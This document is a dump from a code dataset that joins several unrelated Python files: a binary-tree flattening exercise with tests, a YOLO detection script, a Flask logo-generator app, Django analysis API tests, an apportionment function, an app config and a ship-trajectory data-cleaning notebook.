5\n \\\n 6\nChallenge \nDo it in-place without any extra memory.\n\nTags \nBinary Tree Depth First Search\nRelated Problems \nMedium Flatten 2D Vector 46 %\nMedium Flatten Nested List Iterator 27 %\nMedium Convert Binary Search Tree to Doubly Linked List 29 %\nMedium Convert Sorted List to Balanced BST\n\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution: # 29% cases passed, locally : RuntimeError: maximum recursion depth exceeded\n # @param root: a TreeNode, the root of the binary tree\n # @return: nothing\n def flatten_ref(self, root): # ref, use stack, step into and try to understand how it works\n \"\"\"\n Impression is that the current node 's right will be the stack top element.\n :param root: \n :return: \n \"\"\"\n if not root:\n return None\n stack = [root]\n while stack:\n node = stack.pop()\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n node.left = None\n if stack:\n node.right = stack[-1]\n else:\n node.right = None\n\n\n def flatten2(self, root): # ref jiuzhang idea\n # write your code here\n if not root:\n return\n self.flatten(root.left)\n self.flatten(root.right)\n cur = root.left\n if cur:\n # while cur.left: #wrong, already flatten, should be right\n # cur = cur.left\n while cur.right:\n cur = cur.right\n cur.right = root.right\n root.right = root.left\n root.left = None\n\n\n def flatten1(self, root):\n # write your code here\n if not root:\n return\n self.pre_dfs(root)\n\n def pre_dfs(self, root):\n if not root:\n return None, None\n right = root.right\n tail = root\n if root.left:\n lhead, ltail = self.pre_dfs(root.left)\n root.right = lhead\n ltail.right = right\n tail = ltail\n root.left = None\n if right:\n # rhead, rtail = self.pre_dfs(root.right) # wrong to say root.right here, already modified, should be right\n rhead, rtail = self.pre_dfs(right)\n tail.right = rhead\n tail = rtail\n return root, tail\n\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case2(self):\n nums = [1,2]\n root = TreeNode.generate_bt_from_list(nums)\n answer = [1,2]\n self.sol.flatten(root)\n result = TreeNode.get_tree_right_list(root)\n self.assertEqual(answer, result)\n\n def test_case1(self):\n nums = [1,2,5,3,4,None, 6]\n root = TreeNode.generate_bt_from_list(nums)\n answer = [1,2,3,4,5,6]\n self.sol.flatten(root)\n result = TreeNode.get_tree_right_list(root)\n self.assertEqual(answer, result)\n\n\n def test_case11(self): #===>\n nums = \"98,97,#,88,#,84,#,79,87,64,#,#,#,63,69,62,#,#,#,30,#,27,59,9,#,#,#,3,#,0,#,-4,#,-16,#,-18,-7,-19,#,#,#,-23,#,-34,#,-42,#,-59,#,-63,#,-64,#,-69,#,-75,#,-81\"\n answer = \"98,#,97,#,88,#,84,#,79,#,64,#,63,#,62,#,30,#,27,#,9,#,3,#,0,#,-4,#,-16,#,-18,#,-19,#,-23,#,-34,#,-42,#,-59,#,-63,#,-64,#,-69,#,-75,#,-81,#,-7,#,59,#,69,#,87\"\n from util.tree_node import TreeNode\n root = TreeNode.generate_bt_from_string_standard(nums)\n answer_tree = TreeNode.generate_bt_from_string_standard(answer)\n self.sol.flatten(root)\n compare = TreeNode.compare_tree(root, answer_tree)\n self.assertTrue(compare)\n\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n#-*- coding:utf-8 -*-\n\n\"\"\"\n\njiuzhang answer: \n\n\nclass Solution:\n # @param root: a TreeNode, the root of the binary tree\n # @return: nothing\n def flatten(self, root):\n # write your code here\n if root == None:\n return\n self.flatten(root.left)\n self.flatten(root.right)\n p = root\n if p.left == None:\n return\n p = p.left\n while p.right:\n p = p.right\n p.right = root.right\n root.right = root.left\n root.left = None\n\n\n====================================================================================\n\njiuzhang Java version\n\n /**\n * 本代码由九章算法编辑提供。版权所有,转发请注明出处。\n * - 九章算法致力于帮助更多中国人找到好的工作,教师团队均来自硅谷和国内的一线大公司在职工程师。\n * - 现有的面试培训课程包括:九章算法班,系统设计班,算法强化班,Java入门与基础算法班,Android 项目实战班,Big Data 项目实战班,\n * - 更多详情请见官方网站:http://www.jiuzhang.com/?source=code\n */ \n\n// Version 1: Traverse\npublic class Solution {\n private TreeNode lastNode = null;\n\n public void flatten(TreeNode root) {\n if (root == null) {\n return;\n }\n\n if (lastNode != null) {\n lastNode.left = null;\n lastNode.right = root;\n }\n\n lastNode = root;\n TreeNode right = root.right;\n flatten(root.left);\n flatten(right);\n }\n}\n\n// version 2: Divide & Conquer\npublic class Solution {\n /**\n * @param root: a TreeNode, the root of the binary tree\n * @return: nothing\n */\n public void flatten(TreeNode root) {\n helper(root);\n }\n \n // flatten root and return the last node\n private TreeNode helper(TreeNode root) {\n if (root == null) {\n return null;\n }\n \n TreeNode leftLast = helper(root.left);\n TreeNode rightLast = helper(root.right);\n \n // connect leftLast to root.right\n if (leftLast != null) {\n leftLast.right = root.right;\n root.right = root.left;\n root.left = null;\n }\n \n if (rightLast != null) {\n return rightLast;\n }\n \n if (leftLast != null) {\n return leftLast;\n }\n \n return root;\n }\n}\n\n// version 3: Non-Recursion\n/**\n * Definition of TreeNode:\n * public class TreeNode {\n * public int val;\n * public TreeNode left, right;\n * public TreeNode(int val) {\n * this.val = val;\n * this.left = this.right = null;\n * }\n * }\n */\npublic class Solution {\n /**\n * @param root: a TreeNode, the root of the binary tree\n * @return: nothing\n */\n public void flatten(TreeNode root) {\n if (root == null) {\n return;\n }\n \n Stack<TreeNode> stack = new Stack<>();\n stack.push(root);\n \n while (!stack.empty()) {\n TreeNode node = stack.pop();\n if (node.right != null) {\n stack.push(node.right);\n }\n if (node.left != null) {\n stack.push(node.left);\n }\n \n // connect \n node.left = null;\n if (stack.empty()) {\n node.right = null;\n } else {\n node.right = stack.peek();\n }\n }\n }\n}\n\n\n\n\n\"\"\"\n\n\n\n\n","sub_path":"mjbeto/flatten_binary_tree to_linked_list.py","file_name":"flatten_binary_tree to_linked_list.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"334903810","text":"import sys\nimport os\nimport argparse\nfrom yolo import YOLO, detect_video\nfrom PIL import Image\nimport numpy as np\n\ndef detect_img(yolo, input_path, output_path='predict.txt'):\n if input_path == '':\n while True:\n img = input('Input image filename:')\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n continue\n else:\n r_image, _, _, _ = yolo.detect_image(image)\n r_image.show()\n else:\n if output_path == \"\":\n output_path='predict.txt'\n\n list_image = []\n\n if os.path.isfile(input_path):\n with open(input_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n list_image.append(line.split()[0])\n elif os.path.isdir(input_path):\n for file in os.listdir(input_path):\n if file.endswith(\".jpg\"):\n list_image.append(os.path.join(\"input_path\", file))\n else:\n print(\"Input path is invalid\")\n yolo.close_session()\n return\n\n f = open(output_path, 'w')\n for img in list_image:\n print(\"Process \" + img)\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n continue\n else:\n line = img\n _, r_out_boxes, r_out_scores, r_out_classes = yolo.detect_image(image)\n\n for i in range(len(r_out_boxes)):\n top, left, bottom, right = r_out_boxes[i]\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n\n line += ' {},{},{},{},{},{},{}'.format(top, left, bottom, right,\n r_out_scores[i],\n r_out_classes[i],\n yolo.class_names[r_out_classes[i]])\n f.write(line + '\\n')\n\n f.close()\n\n yolo.close_session()\n\nFLAGS = None\n\nif __name__ == '__main__':\n # class YOLO defines the default value, so suppress any default here\n parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)\n '''\n Command line options\n '''\n parser.add_argument(\n '--model_path', type=str,\n help='path to model weight file, default ' + YOLO.get_defaults(\"model_path\")\n )\n\n parser.add_argument(\n '--anchors_path', type=str,\n help='path to anchor definitions, default ' + YOLO.get_defaults(\"anchors_path\")\n )\n\n parser.add_argument(\n '--classes_path', type=str,\n help='path to class definitions, default ' + YOLO.get_defaults(\"classes_path\")\n )\n\n parser.add_argument(\n '--gpu_num', type=int,\n help='Number of GPU to use, default ' + str(YOLO.get_defaults(\"gpu_num\"))\n )\n\n parser.add_argument(\n \"--font_path\", type=str,\n help='path to font, default ' + YOLO.get_defaults(\"font_path\")\n )\n\n parser.add_argument(\n '--image', default=False, action=\"store_true\",\n help='Image detection mode, will ignore all positional arguments'\n )\n '''\n Command line positional arguments -- for video detection mode\n '''\n parser.add_argument(\n \"--input\", nargs='?', type=str,required=False,default='',\n help = \"Video input path\"\n )\n\n parser.add_argument(\n \"--output\", nargs='?', type=str, default=\"\",\n help = \"[Optional] Video output path\"\n )\n\n FLAGS = parser.parse_args()\n\n if FLAGS.image:\n \"\"\"\n Image detection mode, disregard any remaining command line arguments\n \"\"\"\n print(\"Image detection mode\")\n if \"input\" in FLAGS:\n print(\" Ignoring remaining command line arguments: \" + FLAGS.input + \",\" + FLAGS.output)\n detect_img(YOLO(**vars(FLAGS)), FLAGS.input, FLAGS.output)\n elif \"input\" in FLAGS:\n detect_video(YOLO(**vars(FLAGS)), FLAGS.input, FLAGS.output)\n else:\n print(\"Must specify at least video_input_path. See usage with --help.\")\n","sub_path":"yolo_video.py","file_name":"yolo_video.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92783416","text":"\"\"\"\nCreated By : Prasad Pingle\nCreated At : 26 June 2019\nDescription : This is sample flask application with sample API \n to get company details and create logo\nDependancies: Data file \"data/CompaniesList.json\" which contains company details.\n\"\"\"\n\nfrom flask import Flask, request, jsonify, render_template,send_file\nimport json\nimport os\nimport pprint\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n\"Configuration for LOGO LETTERS as alphanumeric only or alphanumeric plus characters (COMMENT ONE OF THE BELOW LINE)\"\nCONST_COMPANY_LETTERS = \"ALPHANUM\"\n# CONST_COMPANY_LETTERS = \"ALPHANUM+SPECIAL\"\n\n\n# Defining the data source for the company details\ndata_source = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data/CompaniesList.json\")\n\n\n# Function read_json_data() : reading the data from json file\n# Created By: Prasad Pingle 30/06/2019\ndef read_json_data(data_source):\n try:\n fp = open(data_source, encoding=\"utf8\") #reading the file in UTF-8 format\n data = json.loads(fp.read())\n return data\n except:\n return jsonify(\"Cannot read file\")\n\n# Function get_all_company_logos() : generating the company logos for all files and passing the generated file for download\n# Created By: Prasad Pingle 30/06/2019\n@app.route('/api/v1/resources/getCompanyLogo/<company_id>', methods=['GET'])\ndef get_company_logo(company_id):\n company_details = read_json_data(data_source)\n company_id = company_id.upper() #Converting to uppercase for handling as IDs are stored in uppercase format in JSON file (CONFIGURABLE)\n try:\n for company_ctr in range(len(company_details)):\n if ('Company Name' in company_details[company_ctr] and 'CompanyId' in company_details[company_ctr] \n and company_details[company_ctr]['CompanyId'] == company_id):\n company_name = company_details[company_ctr]['Company Name'].strip().lower()\n alpha_sort = ''.join(sorted(company_name)) #Sorting the name alphabetically\n if len(alpha_sort) > 0:\n occurence_obj = {}\n occurence_obj = check_occurence(str(alpha_sort))\n logo = generate_logo(occurence_obj)\n company_details[company_ctr]['logoCharacters'] = \",\".join(logo)\n print(\"LOGO\",company_details[company_ctr]['logoCharacters'])\n break\n logo_details = {}\n logo_details['companyId'] = company_details[company_ctr]['CompanyId']\n logo_details['companyName'] = company_details[company_ctr]['Company Name']\n logo_details['companyLogo'] = company_details[company_ctr]['logoCharacters']\n\n return render_template('view_logo.html', companyDetails = logo_details)\n except:\n return render_template('create_logo.html', companyDetails = \"Please enter valid ID\")\n\n\n# Function check_occurence() : checking the occurence of each letter in the company name and returning the object\n# Created By: Prasad Pingle 30/06/2019\ndef check_occurence(str):\n occurence = {}\n for c in str:\n try:\n if CONST_COMPANY_LETTERS == \"ALPHANUM\": #CONFIGURABLE \n if c != \" \" and c.isalnum() == True: #Ignoring the whitespaces as well as special characters\n occurence[c] = str.count(c)\n elif CONST_COMPANY_LETTERS == \"ALPHANUM+SPECIAL\": #CONFIGURABLE\n if c != \" \": #Ignoring the whitespaces but allowing special characters\n occurence[c] = str.count(c)\n except:\n continue\n return occurence\n\n# Function generate_logo() : generating the logo for each company name\n# Created By: Prasad Pingle 30/06/2019\ndef generate_logo(occurence_obj):\n occ_keys = []\n occ_values = []\n occ_keys = list(occurence_obj.keys()) # separating the keys from occurence_obj\n occ_values = list(occurence_obj.values()) # separating the values from occurence_obj\n logo = []\n if len(occ_values) > 0:\n for counter in range(len(occ_values)):\n try:\n max_occ = max(occ_values)\n max_element_index = occ_values.index(max_occ)\n letter = occ_keys[max_element_index]\n logo.append(letter.upper()) #capitalizing the letter\n occ_keys.pop(max_element_index) #removing the maximum element\n occ_values.pop(max_element_index)\n if counter == 2:\n break\n except:\n continue\n return logo\n\n\n# Function create_output_file() : create an output file for logo details(FUTURE SCOPE)\n# Created By: Prasad Pingle 30/06/2019\ndef create_output_file(company_details):\n formatted_company_details = json.dumps(company_details, indent=4)\n f = open(\"company_logo.json\", \"w\")\n f.write((format(formatted_company_details)))\n f.close()\n return formatted_company_details\n \n# Homepage for downloading the company logo file\n# Created By: Prasad Pingle 30/06/2019\n@app.route('/')\ndef index():\n return render_template('create_logo.html')\n\n# Running the application on localhost:8888\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8888)\n\n#Handling for invalid routes\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('create_logo.html', companyDetails = \"Please enter a Id\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"138474583","text":"import pytest\nfrom django.shortcuts import reverse\nfrom django.db import transaction\n\nfrom topobank.manager.tests.utils import SurfaceFactory, Topography1DFactory, UserFactory\nfrom topobank.analysis.tests.utils import TopographyAnalysisFactory\nfrom topobank.analysis.models import Analysis, AnalysisCollection\nfrom topobank.manager.utils import subjects_to_json\n\n\n@pytest.mark.django_db\ndef test_submit_analyses_api(client, test_analysis_function, handle_usage_statistics):\n \"\"\"Test API to submit new analyses.\"\"\"\n\n user = UserFactory()\n surface = SurfaceFactory(creator=user)\n topo1 = Topography1DFactory(surface=surface)\n topo2 = Topography1DFactory(surface=surface)\n\n func = test_analysis_function\n\n client.force_login(user)\n\n with transaction.atomic():\n # trigger \"recalculate\" for two topographies\n response = client.post(reverse('analysis:card-submit'), {\n 'function_id': func.id,\n 'subjects_ids_json': subjects_to_json([topo1, topo2]),\n 'function_kwargs_json': '{}'\n }, HTTP_X_REQUESTED_WITH='XMLHttpRequest') # we need an AJAX request\n assert response.status_code == 200\n\n #\n # Analysis objects should be there and marked for the user\n #\n analysis1 = Analysis.objects.get(function=func, topography=topo1)\n analysis2 = Analysis.objects.get(function=func, topography=topo2)\n\n assert user in analysis1.users.all()\n assert user in analysis2.users.all()\n\n #\n # Don't know yet how execute tasks locally without task queue\n # Celery's \"task_always_eager\" is not suitable for unit testing.\n #\n #\n # assert analysis1.task_state == 'su'\n # assert analysis2.task_state == 'su'\n #\n # #\n # # Collection object should be there and contain those analyses\n # #\n # collection = AnalysisCollection.objects.get(owner=user)\n #\n # assert collection.analyses.count() == 2\n # assert analysis1 in collection.analyses.all()\n # assert analysis2 in collection.analyses.all()\n #\n # #\n # # Notification should be there, since the task has already performed\n # #\n # note = Notification.objects.get(recipient=user, description__contains=\"Tasks finished\")\n # assert note.href == reverse('analysis:collection', kwargs=dict(collection_id=collection.id))\n\n\n@pytest.mark.django_db\ndef test_renew_analyses_api(client, test_analysis_function):\n \"\"\"Test whether existing analyses can be renewed by API call.\"\"\"\n\n user = UserFactory()\n surface = SurfaceFactory(creator=user)\n topo1 = Topography1DFactory(surface=surface)\n topo2 = Topography1DFactory(surface=surface)\n\n func = test_analysis_function\n\n analysis1a = TopographyAnalysisFactory(subject=topo1, function=func)\n analysis2a = TopographyAnalysisFactory(subject=topo2, function=func)\n\n client.force_login(user)\n\n with transaction.atomic():\n # trigger \"renew\" for two specific analyses\n response = client.post(reverse('analysis:renew'), {\n 'analyses_ids[]': [analysis1a.id, analysis2a.id],\n }, HTTP_X_REQUESTED_WITH='XMLHttpRequest') # we need an AJAX request\n assert response.status_code == 200\n\n #\n # Old analyses should be deleted\n #\n with pytest.raises(Analysis.DoesNotExist):\n Analysis.objects.get(id=analysis1a.id)\n with pytest.raises(Analysis.DoesNotExist):\n Analysis.objects.get(id=analysis2a.id)\n\n #\n # New Analysis objects should be there and marked for the user\n #\n analysis1b = Analysis.objects.get(function=func, topography=topo1)\n analysis2b = Analysis.objects.get(function=func, topography=topo2)\n\n assert user in analysis1b.users.all()\n assert user in analysis2b.users.all()\n\n\n\n","sub_path":"topobank/analysis/tests/test_recalculate.py","file_name":"test_recalculate.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"587958356","text":"import math\n\n\ndef calculate_adam(num_seats, populations):\n \"\"\"\n Calculate the initial fair shares, final fair shares, initial quotas, final quotas, initial divisor, and modified\n divisor using Adam's method of apportionment.\n\n :return: A list of initial fair shares, final fair shares, initial quotas, final quotas, initial divisor, \n and modified divisor. \n \"\"\"\n\n # Record divisors.\n estimated_divisors = []\n\n # The number of states to apportion to.\n num_states = len(populations)\n\n # The initial divisor\n initial_divisor = sum(populations) / num_seats\n estimated_divisors.append(initial_divisor)\n\n # The original state quotas respectively.\n initial_quotas = []\n for i, population in enumerate(populations):\n initial_quotas.append(population / initial_divisor)\n\n # The initial state fair shares respectively.\n initial_fair_shares = []\n for i, quota in enumerate(initial_quotas):\n initial_fair_shares.append(math.ceil(quota))\n\n # Initialize the final quota and original quota list values.\n final_quotas = []\n\n # Initialize the modified divisor variable.\n # At this point, the modified divisor is the same as the original divisor value.\n modified_divisor = sum(populations) / num_seats\n\n # Calculate the original quota values.\n # At this point, the final quotas list is the same as the original quotas list.\n for i, population in enumerate(populations):\n final_quotas.append(population / modified_divisor)\n\n # Initialize the final fair shares list to list of zeros.\n final_fair_shares = [0] * num_states\n\n # Initialize an estimator to use in changing the quotas if they need to be reapportioned.\n estimator = sum(populations) / num_seats\n\n # Initialize a time keeper to break from the loop if apportionment is impossible.\n time_keeper = 0\n\n # Start the apportionment process.\n while sum(final_fair_shares) != num_seats:\n if time_keeper == 5000:\n break\n for i, quota in enumerate(final_quotas):\n final_fair_shares[i] = math.ceil(quota)\n\n # Recalculate the divisor if the seats are not fully apportioned.\n if sum(final_fair_shares) != num_seats:\n\n # Increase the modified divisor if it is too little.\n if sum(final_fair_shares) > num_seats:\n modified_divisor += estimator\n\n # Decrease the modified divisor if it is too high\n else:\n modified_divisor -= estimator\n\n # Decrease the estimator so the next loop will not result in the previous modified divisor\n estimator = estimator / 2\n\n # The modified divisor cannot ever be 0 (prevents divide by 0 error)\n if modified_divisor == 0:\n modified_divisor = 1\n\n # Recalculate the quotas with the updated modified divisor.\n for i, population in enumerate(populations):\n final_quotas[i] = population / modified_divisor\n\n # Reapportion the seats to states given a set of new quotas.\n for i, quota in enumerate(final_quotas):\n final_fair_shares[i] = math.ceil(quota)\n\n # Save updated divisor.\n estimated_divisors.append(modified_divisor)\n\n time_keeper += 1\n\n # If the loop didn't naturally end, return null values.\n if time_keeper == 5000:\n raise Exception(\"Incalculable values.\")\n\n # Return a list for final fair shares, final quotas and a value for the modified divisor.\n else:\n return initial_fair_shares, final_fair_shares, initial_quotas, final_quotas, initial_divisor, modified_divisor \\\n , estimated_divisors\n","sub_path":"apportionpy/methods/adam.py","file_name":"adam.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"74170740","text":"\"\"\"\n\tConfiguration will be set up as an object named \"Config\" with a list\n of attributes or members as config variables\n\"\"\"\nimport os\nimport pickle\nbasedir = os.path.abspath(os.path.dirname(__file__))\nfrom webapp.models import Mlmodel\n\"\"\"\nbasedir is:\n.../DIPLOMADO-UPEL-EducacionUniversitaria/TEMAS-o-AREAS/COMPUTER-SCIENCE/EJEMPLOS/PYTHON/FLASK/sentimentpredictor\n\"\"\"\n#print(\"Base dir is: {}\".format(basedir))\nclass Config(object):\n \"\"\" if no OS env variable is set, SECRET_KEY will assume the hardcoded string as its value \"\"\"\n SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'\n \"\"\"\n\tThe location of the application's database. If the DATABASE_URL envvar is not set,\n\tthen\n \"\"\"\n \"\"\"\n MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'smtp.gmail.com'\n MAIL_PORT = int(os.environ.get('MAIL_PORT') or 465 )\n MAIL_USE_SSL = os.environ.get('MAIL_USE_SSL') or True\n #MAIL_USE_TLS = int(os.environ.get('MAIL_USE_TLS') or 1)#\n MAIL_USERNAME = os.environ.get('MAIL_USERNAME') or 'victor.liendo@gmail.com'\n MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD') or 'Jwl10_c3sar'\n ADMINS = ['victor.liendo@gmail.com']\n \"\"\"\n \"\"\" For email management during development phase\n\t\tDEBUG MODE MUST BE SET TO 0, and the FAKE email server must be running\n\t\tpython -m smtpd -n -c DebuggingServer localhost:8025\n \"\"\"\n\n MAIL_SERVER = os.environ.get('MAIL_SERVER') or 'localhost'\n MAIL_PORT = int(os.environ.get('MAIL_PORT') or 8025)\n ADMINS = ['victor.liendo@gmail.com']\n print(\"HOLA Base dir is: {}\".format(basedir))\n \"\"\"THE PREVIOUSLY SAVED ML MODEL\"\"\"\n MODEL = pickle.load(open(os.path.join(basedir, 'ML-model/LR-with-CountVectorizer-for-SentimentAnalisis.pkl'), 'rb'))\n VECTOR = pickle.load(open(os.path.join(basedir, 'ML-model/CountVectorizer-vector.pkl'), 'rb'))\n APPMODEL=Mlmodel(MODEL,VECTOR)\n print(APPMODEL.get_model_type())\n print(APPMODEL.get_vector_type())\n","sub_path":"sentimentpredictor/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"212408315","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport glob\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom sklearn.model_selection import KFold\nimport lightgbm as lgb\nimport requests\nfrom sklearn.model_selection import StratifiedKFold\nfrom lightgbm.sklearn import LGBMClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score, f1_score,mean_squared_error,explained_variance_score\nfrom scipy.stats import entropy, kurtosis\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split \nimport pickle\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport time\nimport datetime\nimport gc\nimport warnings\n\nwarnings.filterwarnings('ignore')\npd.set_option('display.max_columns', None)\n\n\n# In[2]:\n\n\ndef reduce_mem(df):\n start_mem = df.memory_usage().sum() / 1024 ** 2\n for col in df.columns:\n col_type = df[col].dtypes\n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024 ** 2\n print('{:.2f} Mb, {:.2f} Mb ({:.2f} %)'.format(start_mem, end_mem, 100 * (start_mem - end_mem) / start_mem))\n gc.collect()\n return df\n\n\n# In[3]:\n\n\ndata = pd.read_pickle('./data/sample_180.pkl')\ndata['timestamp'] = data['timestamp'].astype('str')\ndata = reduce_mem(data)\ngc.collect()\n\n\n# In[4]:\n\n\ntest = pd.read_csv('./data/Btest0711_ALL.csv')\ntrain1 = pd.read_csv('./data/R2 ATest 0711.csv')\ntrain1_label = base = pd.read_csv('./data/Abase.csv')\nport = pd.read_csv('./data/port_2.csv')\n\n\n# In[5]:\n\n\n#去掉A榜测试数据中被删掉的评分订单,用于之后加入训练数据进行训练\nl1 = ['AC860038925693',\n'CS952075060675',\n'DM428031991357',\n'DS626552529494',\n'EI581767201011',\n'GA472803281061',\n'HL358914564422',\n'JE845105704656',\n'LK919030439899',\n'LR291426429726',\n'LY233998601535',\n'NJ417242079579',\n'PP710466021916',\n'PQ602767500334',\n'QF723400588858',\n'UK663883669352',\n'VJ323567531982',\n'ZQ798500357614',\n'ZS950908209190']\ntrain1 = train1[~train1['loadingOrder'].isin(l1)].reset_index(drop=True)\ntrain1_label = train1_label[~train1_label['loadingOrder'].isin(l1)].reset_index(drop=True)\n\n\n# In[6]:\n\n\n#数据去重\ndata1 = data.drop_duplicates(['loadingOrder','timestamp','vesselMMSI'])\ndel data\n\n\n# ### 将所有的文件按照时间顺序进行排序\n\n# In[7]:\n\n\ndata1['timestamp'] = pd.to_datetime(data1['timestamp'], infer_datetime_format=True)\ndata1 = data1.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[8]:\n\n\ntrain1['timestamp'] = pd.to_datetime(train1['timestamp'], infer_datetime_format=True)\ntrain1 = train1.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[9]:\n\n\ntest['timestamp'] = pd.to_datetime(test['timestamp'], infer_datetime_format=True)\ntest = test.groupby(['loadingOrder','vesselMMSI']).apply(lambda x: x.sort_values('timestamp')).reset_index(drop=True)\n\n\n# In[10]:\n\n\n#数据去重\ndata1 = data1.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\ntest = test.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\ntrain1 = train1.drop_duplicates(['longitude','vesselMMSI','latitude','loadingOrder'])\n\n\n# ### 数据清洗\n\n# In[11]:\n\n\ndef get_sample_anchor(df):\n # 转化为360度数\n df['timestamp'] = pd.to_datetime(df['timestamp'], infer_datetime_format=True) \n tmp=df.groupby(['loadingOrder','vesselMMSI'])\n df['lat_diff'] = tmp['latitude'].diff(1)\n df['lon_diff'] = tmp['longitude'].diff(1)\n df['diff_seconds'] = tmp['timestamp'].diff(1).dt.total_seconds()\n #df['change_ratio'] = (abs(df['lat_diff'])+abs(df['lon_diff']))/((df['diff_seconds'])/60)\n return df\ndata1 = get_sample_anchor(data1)\ntest = get_sample_anchor(test)\ntrain1 = get_sample_anchor(train1)\ngc.collect()\n\n\n# In[12]:\n\n\n#test = test[test['diff_seconds']>=30]\n#去掉训练数据中出现两次及以上数据大量偏移的数据\nl1 = []\nfor i,v in data1[((abs(data1['lon_diff'])+abs(data1['lat_diff']))>20)&(abs(data1['diff_seconds'])<86400)].loadingOrder.value_counts().items():\n if v>1:\n l1.append(i)\ndata1 = data1[~(data1['loadingOrder'].isin(l1))]\ndel l1\n'''#同理去除停港时间很长的数据\nl1 = list(data1[(data1['diff_seconds']>864000)&((abs(data1['lon_diff'])+abs(data1['lat_diff']))<1)].loadingOrder.value_counts().index)\ndata1 = data1[~(data1['loadingOrder'].isin(l1))]\ndel l1'''\ngc.collect()\n\n\n# In[13]:\n\n\n#去除direction为-1,和时间差为0的数据,速度小于0或大于等于40的也删除\ndef get_train_sample(df):\n #df = df.loc[df['direction'] != -1]\n df = df.loc[df['diff_seconds'] != 0]\n df = df.loc[(df['speed']>=0)]\n #df = df.loc[(df['speed']>=0)&(df['speed']<=50)]\n del df['lat_diff'],df['lon_diff'],df['diff_seconds']\n return df\ndef get_test_sample(df):\n #df = df.loc[df['direction'] != -1]\n df = df.loc[df['diff_seconds'] != 0]\n df = df.loc[(df['speed']>=0)]\n #df = df.loc[(df['speed']>=0)&(df['speed']<=50)]\n del df['lat_diff'],df['lon_diff'],df['diff_seconds']\n return df\ndata1 = get_train_sample(data1)\ntest = get_test_sample(test)\ntrain1 = get_test_sample(train1)\ngc.collect()\n\n\n# In[14]:\n\n\ntrain1['timestamp'] = train1['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntrain1['timestamp'] = pd.to_datetime(train1['timestamp'], infer_datetime_format=True)\n\n\n# ### 经纬度特征获取与清洗\n\n# In[15]:\n\n\ndata1 = data1.loc[data1['TRANSPORT_TRACE'].notnull()]\ndata1['len'] = data1['TRANSPORT_TRACE'].str.split('-')\ndata1['len'] = data1['len'].str.len()\ndata1 = data1.loc[(data1['len']>=2)]\ngc.collect()\n\n\n# In[16]:\n\n\ntest['len'] = test['TRANSPORT_TRACE'].str.split('-')\ntest['len'] = test['len'].str.len()\ngc.collect()\n\n\n# In[17]:\n\n\ntrain1['len'] = train1['TRANSPORT_TRACE'].str.split('-')\ntrain1['len'] = train1['len'].str.len()\ngc.collect()\n\n\n# 